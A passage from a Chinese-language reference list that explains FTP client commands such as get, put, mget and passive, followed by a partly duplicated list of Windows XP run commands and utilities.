3.account[password]: 提供登錄遠程系統成功後訪問系統資源所需的補充口令。
4.append local-file[remote-file]:將本地文件追加到遠程系統主機,若未指定遠程系統文件名,則使用本地文件名。
5.ascii:使用ascii類型傳輸方式。
6.bell:每個命令執行完畢後計算機響鈴一次。
7.bin:使用二進制文件傳輸方式。
8.bye:退出ftp會話過程。
9.case:在使用mget時,將遠程主機文件名中的大寫轉爲小寫字母。
10.cd remote-dir:進入遠程主機目錄。
11.cdup:進入遠程主機目錄的父目錄。
12.chmod mode file-name:將遠程主機文件file-name的存取方式設置爲mode,如:chmod 777 a.out。
13.close:中斷與遠程服務器的ftp會話(與open對應)。
14.cr:使用asscii方式傳輸文件時,將回車換行轉換爲回行。
15.delete remote-file:刪除遠程主機文件。
16.debug[debug-value]:設置調試方式, 顯示發送至遠程主機的每條命令,如:deb up 3,若設爲0,表示取消debug。
17.dir[remote-dir][local-file]:顯示遠程主機目錄,並將結果存入本地文件。
18.disconnection:同close。
19.form format:將文件傳輸方式設置爲format,缺省爲file方式。
20.get remote-file[local-file]: 將遠程主機的文件remote-file傳至本地硬盤的local-file。
21.glob:設置mdelete,mget,mput的文件名擴展,缺省時不擴展文件名,同命令行的-g參數。
22.hash:每傳輸1024字節,顯示一個hash符號(#)。
23.help[cmd]:顯示ftp內部命令cmd的幫助信息,如:help get。
24.idle[seconds]:將遠程服務器的休眠計時器設爲[seconds]秒。
25.image:設置二進制傳輸方式(同binary)。
26.lcd[dir]:將本地工作目錄切換至dir。
27.ls[remote-dir][local-file]:顯示遠程目錄remote-dir, 並存入本地文件local-file。
28.macdef macro-name:定義一個宏,遇到macdef下的空行時,宏定義結束。
29.mdelete[remote-file]:刪除遠程主機文件。
30.mdir remote-files local-file:與dir類似,但可指定多個遠程文件,如 :mdir *.o.*.zipoutfile 。
31.mget remote-files:傳輸多個遠程文件。
32.mkdir dir-name:在遠程主機中建一目錄。
33.mls remote-file local-file:同nlist,但可指定多個文件名。
34.mode[modename]:將文件傳輸方式設置爲modename, 缺省爲stream方式。
35.modtime file-name:顯示遠程主機文件的最後修改時間。
36.mput local-file:將多個文件傳輸至遠程主機。
37.newer file-name: 如果遠程機中file-name的修改時間比本地硬盤同名文件的時間更近,則重傳該文件。
38.nlist[remote-dir][local-file]:顯示遠程主機目錄的文件清單,並存入本地硬盤的local-file。
39.nmap[inpattern outpattern]:設置文件名映射機制, 使得文件傳輸時,文件中的某些字符相互轉換, 如:nmap $1.$2.$3[$1,$2].[$2,$3],則傳輸文件a1.a2.a3時,文件名變爲a1,a2。該命令特別適用於遠程主機爲非UNIX機的情況。
40.ntrans[inchars[outchars]]:設置文件名字符的翻譯機制,如ntrans1R,則文件名LLL將變爲RRR。
41.open host[port]:建立指定ftp服務器連接,可指定連接端口。
42.passive:進入被動傳輸方式。
43.prompt:設置多個文件傳輸時的交互提示。
44.proxy ftp-cmd:在次要控制連接中,執行一條ftp命令, 該命令允許連接兩個ftp服務器,以在兩個服務器間傳輸文件。第一條ftp命令必須爲open,以首先建立兩個服務器間的連接。
45.put local-file[remote-file]:將本地文件local-file傳送至遠程主機。
46.pwd:顯示遠程主機的當前工作目錄。
47.quit:同bye,退出ftp會話。
48.quote arg1,arg2...:將參數逐字發至遠程ftp服務器,如:quote syst.
49.recv remote-file[local-file]:同get。
50.reget remote-file[local-file]:類似於get, 但若local-file存在,則從上次傳輸中斷處續傳。
51.rhelp[cmd-name]:請求獲得遠程主機的幫助。
52.rstatus[file-name]:若未指定文件名,則顯示遠程主機的狀態, 否則顯示文件狀態。
53.rename[from][to]:更改遠程主機文件名。
54.reset:清除回答隊列。
55.restart marker:從指定的標誌marker處,重新開始get或put,如:restart 130。
56.rmdir dir-name:刪除遠程主機目錄。
57.runique:設置文件名只一性存儲,若文件存在,則在原文件後加後綴.1, .2等。
58.send local-file[remote-file]:同put。
59.sendport:設置PORT命令的使用。
60.site arg1,arg2...:將參數作爲SITE命令逐字發送至遠程ftp主機。
61.size file-name:顯示遠程主機文件大小,如:site idle 7200。
62.status:顯示當前ftp狀態。
63.struct[struct-name]:將文件傳輸結構設置爲struct-name, 缺省時使用stream結構。
64.sunique:將遠程主機文件名存儲設置爲只一(與runique對應)。
65.system:顯示遠程主機的操作系統類型。
66.tenex:將文件傳輸類型設置爲TENEX機的所需的類型。
67.tick:設置傳輸時的字節計數器。
68.trace:設置包跟蹤。
69.type[type-name]:設置文件傳輸類型爲type-name,缺省爲ascii,如:type binary,設置二進制傳輸方式。
70.umask[newmask]:將遠程服務器的缺省umask設置爲newmask,如:umask 3
71.user user-name[password][account]:向遠程主機表明自己的身份,需要口令時,必須輸入口令,如:user anonymous my@email。
72.verbose:同命令行的-v參數,即設置詳盡報告方式,ftp 服務器的所有響 應都將顯示給用戶,缺省爲on.
73.?[cmd]:同help.
#11 十一:
7:計算機運行命令全集 winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設置
write----------寫字板winmsd-----系統信息
wiaacmgr-------掃描儀和照相機嚮導
winchat--------XP自帶局域網聊天
mem.exe--------顯示內存使用情況
Msconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠程桌面連接
mplayer2-------媒體播放機
magnify--------放大鏡實用程序
mmc------------打開控制檯
mobsync--------同步命令
dxdiag---------檢查DirectX信息
drwtsn32------ 系統醫生
devmgmt.msc--- 設備管理器
dfrg.msc-------磁盤碎片整理程序
diskmgmt.msc---磁盤管理實用程序
dcomcnfg-------打開系統組件服務
ddeshare-------打開DDE共享設置
dvdplay--------DVD播放器
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------打開記事本
nslookup-------網絡管理的工具嚮導
ntbackup-------系統備份和還原
narrator-------屏幕"講述人"
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat -an----(TC)命令檢查接口
syncapp--------創建一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
sndrec32-------錄音機
shrpubw--------創建共享文件夾
secpol.msc-----本地安全策略
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
services.msc---本地服務設置
Sndvol32-------音